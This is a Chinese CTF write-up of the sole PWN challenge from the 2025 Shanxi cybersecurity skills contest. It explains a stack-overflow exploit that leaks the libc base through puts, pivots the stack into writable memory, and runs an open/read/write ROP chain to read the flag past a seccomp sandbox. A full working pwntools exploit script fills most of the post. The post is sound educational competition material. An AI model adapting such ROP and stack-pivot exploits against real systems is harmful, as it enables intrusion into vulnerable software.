2025山西省网络安全职业技能大赛PWN方向题解

Claire_ccat2025-11-08 9:57

两个半小时的比赛,pwn方向只有一道题目

比赛现场 ida 坏了,没想着去做 pwn 题...

赛后发现挺简单的,64 位沙箱orw,侥幸拿下赛道第一......
赛题附件下载

给了 libc 、ld 和 elf 文件,先 patchelf

patchelf 过程中发现有沙箱,dump 一下规则

只可以用 orw

没开 PIE 和 canary

栈溢出先利用 puts 函数泄露 libc 基址

填充是0x20 + 8

再找一片有读写权限的空闲地址

libc 上面这片正好合适,为了防止栈增减,取中间位置rw_mem = libc.address - 0x1000

这里用来构建 ROP 链,然后在buf_addr = rw_mem + 0x100位置用于存读进来的 flag

在第二次传 payload 时先调用 read 将 orw 的 rop 链读进rw_mem,同时栈迁移过去,执行 orw 操作

python 复制代码 
from pwn import *
elf = ELF("./pwn")
libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
p = process([elf.path])

# gdb.attach(p, "b *0x4012F9\nc")
# pause()

payload = 'a' * 0x20
payload += 'b' * 8
payload += p64(elf.search(asm('pop rdi; ret;'), executable=True).next())
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(0x4012F9) # main()
p.sendlineafter("hello sandbox!\n", payload)
libc.address = u64(p.recvuntil('\x7F')[-6:].ljust(8, '\x00')) - libc.sym['puts']
info("libc base: " + hex(libc.address))

rw_mem = libc.address - 0x1000
buf_addr = rw_mem + 0x100

payload = 'c' * 0x20
payload += p64(rw_mem - 8)
payload += p64(libc.search(asm('pop rdi; ret;'), executable=True).next())
payload += p64(0)
payload += p64(libc.search(asm('pop rsi; ret;'), executable=True).next())
payload += p64(rw_mem)
payload += p64(libc.search(asm('pop rdx; ret;'), executable=True).next())
payload += p64(0x108)
payload += p64(libc.sym['read'])
payload += p64(elf.search(asm('leave; ret;'), executable=True).next())

# gdb.attach(p)
# pause()

p.sendlineafter("hello sandbox!\n", payload)
sleep(1)

rop = ''
rop += p64(libc.search(asm('pop rdi; ret;'), executable=True).next())
rop += p64(buf_addr)
rop += p64(libc.search(asm('pop rsi; ret;'), executable=True).next())
rop += p64(0)
rop += p64(libc.search(asm('pop rax; ret'), executable=True).next())
rop += p64(0x2)
rop += p64(libc.search(asm('syscall; ret;'), executable=True).next())

rop += p64(libc.search(asm('pop rdi; ret;'), executable=True).next())
rop += p64(3)
rop += p64(libc.search(asm('pop rsi; ret;'), executable=True).next())
rop += p64(buf_addr)
rop += p64(libc.search(asm('pop rdx; ret'), executable=True).next())
rop += p64(0x100)
rop += p64(libc.search(asm('pop rax; ret'), executable=True).next())
rop += p64(0x0)
rop += p64(libc.search(asm('syscall; ret;'), executable=True).next())

rop += p64(libc.search(asm('pop rdi; ret;'), executable=True).next())
rop += p64(1)
rop += p64(libc.search(asm('pop rsi; ret;'), executable=True).next())
rop += p64(buf_addr)
rop += p64(libc.search(asm('pop rdx; ret'), executable=True).next())
rop += p64(0x100)
rop += p64(libc.search(asm('pop rax; ret'), executable=True).next())
rop += p64(0x1)
rop += p64(libc.search(asm('syscall; ret;'), executable=True).next())

rop = rop.ljust(0x100, '\x00')
rop += "./flag\x00"

# gdb.attach(p)
# pause()
p.send(rop)

p.interactive()

运行 exp.py

成功打印本地 flag

相关推荐
ESBK20253 分钟前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
消失的旧时光-194315 分钟前
Linux 编辑器入门:nano 与 vim 的区别与选择指南
linux·运维·服务器
晓131325 分钟前
第七章 【C语言篇:文件】 文件全面解析
linux·c语言·开发语言
旺仔Sec27 分钟前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
唐装鼠34 分钟前
Linux 下 malloc 内存分配机制详解
linux·malloc
予枫的编程笔记34 分钟前
【Linux入门篇】Linux运维必学:Vim核心操作详解,告别编辑器依赖
linux·人工智能·linux运维·vim操作教程·程序员工具·编辑器技巧·新手学vim
17(无规则自律)1 小时前
深入浅出 Linux 内核模块,写一个内核版的 Hello World
linux·arm开发·嵌入式硬件
七牛云行业应用1 小时前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
浩浩测试一下1 小时前
内网---> WriteOwner权限滥用
网络·汇编·windows·安全·microsoft·系统安全
中二病码农不会遇见C++学姐1 小时前
Linux下的.run文件
linux
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03使用 1panel面板 部署 php网站04Vue-skills的中文文档05OpenClaw Chrome扩展使用教程 - 浏览器中继控制06从零搭建一个 PHP 登录注册系统(含完整源码)07让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南08UV安装并设置国内源09Claude Code Skills 实用使用手册10一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示